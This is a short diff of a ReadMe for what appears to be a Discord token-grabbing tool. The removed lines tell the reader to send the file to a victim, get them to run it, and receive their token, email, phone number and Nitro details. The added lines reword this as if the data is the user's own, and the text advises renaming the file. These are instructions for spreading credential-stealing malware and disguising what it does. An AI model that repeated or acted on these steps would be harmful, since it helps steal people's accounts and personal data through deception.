Josh-J340/token-discord/ReadMe.txt

 Final step: once you open the ''Josh's project'' All your data will be on there...your token, email, phone number, nitro ect.

-Send the file to your victom and make them download it and run it...
+open the file and download it and run it

-All thier data will be sent to you!
+All your data will be sent to you!

 Dont forget to rename the file.